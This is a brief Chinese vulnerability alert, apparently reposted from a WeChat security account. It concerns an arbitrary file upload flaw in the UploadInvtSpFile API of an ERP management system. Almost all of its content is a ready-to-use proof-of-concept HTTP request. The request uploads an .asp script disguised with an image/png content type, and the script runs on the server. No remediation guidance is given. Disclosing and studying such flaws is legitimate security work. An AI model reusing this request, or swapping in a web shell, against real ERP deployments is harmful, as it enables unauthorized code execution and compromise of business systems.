POC获取
POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=-----------------1111 Content-Length: 178 -------------------1111 Content-Disposition: form-data; name="filedata"; filename="2142142142.asp" Content-Type: image/png <% response.write("1111")%> -------------------1111-- 回显路径
原文始发于微信公众号(小白菜安全):漏洞推送|某景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论